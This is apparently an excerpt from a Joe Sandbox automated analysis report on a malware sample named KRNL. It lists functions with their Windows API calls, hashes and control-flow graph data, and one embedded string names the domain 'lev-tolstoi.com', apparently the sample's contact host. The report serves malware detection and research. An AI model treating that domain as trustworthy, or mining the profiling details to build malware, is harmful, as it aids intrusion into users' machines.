                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21A2BAE406228BC725CF58CC95BAAF7B0FF49700F024228ED49BB750D635AC4287D4
                                                                                                                                                                                                                                                          Function 0043F150 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                                          • Instruction ID: bda42ee7fe58aa78db34f1b728a56894abae76de33374c7402216ab42dc0119f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29812636A042119BCB249F18CC40AAFB3A2FFD8710F15A53DED859B364EB34AC158385
                                                                                                                                                                                                                                                          Function 0043B1D0 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                                          • Instruction ID: e6a55991c61f36b3aa79f998637d078abe9e386279f295a7a094abe81f2018d2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97513735A083149BE720EF25C84476BB3A2FFD9700F15953EDA849B361E7756C1187C9
                                                                                                                                                                                                                                                          Function 0042B00F Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                                          • Instruction ID: f6c1554600131ee17df06160cbc0b7981c093ccfdab986da07a7a73cd69f7880
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81415121B542778BEB148A249C623B7F791EB66380F9C827BD85587381E31CDC16E3D6
                                                                                                                                                                                                                                                          Function 004404D0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                                          • Instruction ID: de807461c8146aa5c2ca4a7867b47f0d9f0c6b40113fcb14a59165e0f2bfc41e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED412638258300ABE714DF54DC81BBBB3A6EBC5314F19542EE2859B3A0D679AC319B09
                                                                                                                                                                                                                                                          Function 004086C0 Relevance: 7.6, APIs: 5, Instructions: 92threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004086E2
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004086E8
                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004086F9
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004087BA
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004087F9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4063528623-0
                                                                                                                                                                                                                                                          • Opcode ID: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
                                                                                                                                                                                                                                                          • Instruction ID: 2ce280b1cfb3896d9c47e6bfffc2885025d21bcec38fee026491e5ccd9a28d87
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA2157B5E002005BD714BB25DE0B7AA36929FC6715F19853EF481FB3EADE7D4801829E
                                                                                                                                                                                                                                                          Function 0040E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 928 40e042-40e066 call 409570 CoUninitialize 931 40e070-40e0e2 928->931 931->931 932 40e0e4-40e156 931->932 933 40e160-40e187 932->933 933->933 934 40e189-40e19a 933->934 935 40e1bb-40e1c3 934->935 936 40e19c-40e1aa 934->936 938 40e1c5-40e1c6 935->938 939 40e1db-40e1e8 935->939 937 40e1b0-40e1b9 936->937 937->935 937->937 940 40e1d0-40e1d9 938->940 941 40e1ea-40e1f1 939->941 942 40e20b-40e213 939->942 940->939 940->940 943 40e200-40e209 941->943 944 40e215-40e216 942->944 945 40e22b-40e235 942->945 943->942 943->943 948 40e220-40e229 944->948 946 40e237-40e23b 945->946 947 40e24b-40e257 945->947 949 40e240-40e249 946->949 950 40e271-40e3a4 947->950 951 40e259-40e25b 947->951 948->945 948->948 949->947 949->949 953 40e3b0-40e3db 950->953 952 40e260-40e26d 951->952 952->952 954 40e26f 952->954 953->953 955 40e3dd-40e402 953->955 954->950 956 40e410-40e44f 955->956 956->956 957 40e451-40e480 call 40b640 956->957 959 40e485-40e4b1 957->959
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                          • String ID: >$&j=$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 3861434553-369662323
                                                                                                                                                                                                                                                          • Opcode ID: 3d28a1f1a15885d9d52034b46abf3598a3a277188b4e8ec1b803c36980448f93
                                                                                                                                                                                                                                                          • Instruction ID: 1fb7841e1e2579a847afcb15edb254a2e2fdfe5f13ac9abd7e0cca66af938fd0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d28a1f1a15885d9d52034b46abf3598a3a277188b4e8ec1b803c36980448f93
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6A1EE7150D3928BD3348F2AD4947ABBBE1AFD2300F28996DC4D96B3A1D7390419CB96
                                                                                                                                                                                                                                                          Function 0042BAB3 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C98B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ComputerName
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3545744682-0
                                                                                                                                                                                                                                                          • Opcode ID: 138642e3b029cd67481014b7a1c73e129986cda9bd7b72bccbddae5cfeb5dc20
                                                                                                                                                                                                                                                          • Instruction ID: 277084f53d57a87b5b2b20f77d7380db257985fd3cb1fd9ab0cb610f189f46a1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 138642e3b029cd67481014b7a1c73e129986cda9bd7b72bccbddae5cfeb5dc20
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE21D0752193918AD3358F25C8593EBB7E1EFD6300F68486EC4C9CB291DB7480498B55
                                                                                                                                                                                                                                                          Function 00436B2D Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 00436B5E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 95929093-0
                                                                                                                                                                                                                                                          • Opcode ID: 31306f98e230910a5fd7d7977191c2fec37472a6c1007d9d0bebbc925698677f
                                                                                                                                                                                                                                                          • Instruction ID: cdf554ddc886994256fa701720874313e26cc57f0015e9f664b6f87ea11e118c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31306f98e230910a5fd7d7977191c2fec37472a6c1007d9d0bebbc925698677f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB11E472B112158BD718CB68CD526EEA7F3AFDD300F2AD07EC449D7298DA3C4A458A15
                                                                                                                                                                                                                                                          Function 0043CCC0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B4B0,00000000,00000001), ref: 0043CCF2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: f74496de956946dffa7b91c889c0a81754d677ad04bfa79f72b50fce16be8890
                                                                                                                                                                                                                                                          • Instruction ID: 3e35ca9de78357d80fd4bacc6a075dc7f03e91ea1ec4ff9afb29cf567c24048d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f74496de956946dffa7b91c889c0a81754d677ad04bfa79f72b50fce16be8890
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE02B72404211EBC6512F267C06B5F3B68EF8B764F06183AF800A2162DB39F811C2DE
                                                                                                                                                                                                                                                          Function 0040CC13 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC25
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                                          • Opcode ID: 285b51be9f12c006e86ee7f8c2a2ec48db26b0aafef5a544261be67158f7b437
                                                                                                                                                                                                                                                          • Instruction ID: c1ba3966c5ebc0bb1aa72e15ac49d3ddb4e269f0deaef98e892af36381d0cc8b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 285b51be9f12c006e86ee7f8c2a2ec48db26b0aafef5a544261be67158f7b437
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AE0D87A7E0A043AF25C4629DD37F545153A7C1B12F38C36CB3122D2DCC5B4A4028108
                                                                                                                                                                                                                                                          Function 0042EBD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                                                                                                                          • Opcode ID: 9296605408a4aa8f42ffeadd4301eca10fa856db4b8f8b03f33fe2ee125ce19c
                                                                                                                                                                                                                                                          • Instruction ID: dd30eb0f9bedd3f719cd28822517c03636a8239ffc1cd416ab20bf3b2583c864
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9296605408a4aa8f42ffeadd4301eca10fa856db4b8f8b03f33fe2ee125ce19c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F06D745097029FD314DF64D5A871ABBF1FB85304F50881DE4958B7A0C7B6A549CF82
                                                                                                                                                                                                                                                          Function 00431563 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                                                                                                                          • Opcode ID: a1bf64a6e68641f34fd65572d82cba1ace6207dc8bbbf3c2df9395e530bc443d
                                                                                                                                                                                                                                                          • Instruction ID: 4c45bf1f3b2393cf066d11d4a873c6d75db077c42eb8bc10690dc6e6087ea188
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1bf64a6e68641f34fd65572d82cba1ace6207dc8bbbf3c2df9395e530bc443d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF0B2B46083029FE314EF29C5A871BBBE4AFC5304F11891CE4958B290CBB99949CF82
                                                                                                                                                                                                                                                          Function 0043CE81 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043CE9A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                          • Opcode ID: 50d67614470f5ac9744d5140c2bd38d875ead9fb31099f94075d403dcd0e0617
                                                                                                                                                                                                                                                          • Instruction ID: ac7b53e1434bc05ab928a2aff0f00397df47a67b60f94d82b014c2efecf6ae2b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50d67614470f5ac9744d5140c2bd38d875ead9fb31099f94075d403dcd0e0617
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE086BD9042429FC700DF14EC458653364EB1A315704443EE142C3372DA36D903DE08
                                                                                                                                                                                                                                                          Function 0040CBE0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CBF3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                          • Opcode ID: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
                                                                                                                                                                                                                                                          • Instruction ID: 276ef5dfe185dc0c3bd898d983644633ece5b914e2c36080a16977790bdaa27c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D0A7345D01447BE344A75CEC07F22375C9793716F900235F662D65E1D9906910D6BD
                                                                                                                                                                                                                                                          Function 0043B1A0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004121FC), ref: 0043B1BE
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                          • Opcode ID: 764c5e292d854dffb3dce8f316635c8f35a8183dcbb4b133c646b31cf2cd0cc2
                                                                                                                                                                                                                                                          • Instruction ID: c647758476c43136972f23f3513579106d4cce35488911c36db9c9bf482454e3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 764c5e292d854dffb3dce8f316635c8f35a8183dcbb4b133c646b31cf2cd0cc2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37D01231405523EBC7101F19FC06B8A3A94DF0A321F430865B4046B0B1C664EC9086D8
                                                                                                                                                                                                                                                          Function 0043B180 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,00408749,?,00408749), ref: 0043B190
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: f1ba20e54d5aeeddf63a642a1b492bef5fac5cb591cb86e8b73edcf7f871e8f5
                                                                                                                                                                                                                                                          • Instruction ID: bd46a91a5c1b4e186f451d2a3caef90eea8ed5143fba280766b224e500ec41e2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1ba20e54d5aeeddf63a642a1b492bef5fac5cb591cb86e8b73edcf7f871e8f5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31C09B31045121EBC6502F16FC05FC63F54EF55355F051455B404670F1C760EC41CADC

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 00423C40 Relevance: 39.2, APIs: 2, Strings: 20, Instructions: 663COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D59
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00423D99
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                                          • API String ID: 237503144-3538275056
                                                                                                                                                                                                                                                          • Opcode ID: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
                                                                                                                                                                                                                                                          • Instruction ID: 1666b33dfea27814c8a335e8a4f19e8460577b272b6aed58dd039adecd7a2ec5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA7263B99053699BDB60DF19DC883CDBB71FB95304F108AE9C4592B390DB784A81CF86
                                                                                                                                                                                                                                                          Function 00423EC0 Relevance: 39.2, APIs: 1, Strings: 21, Instructions: 651COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
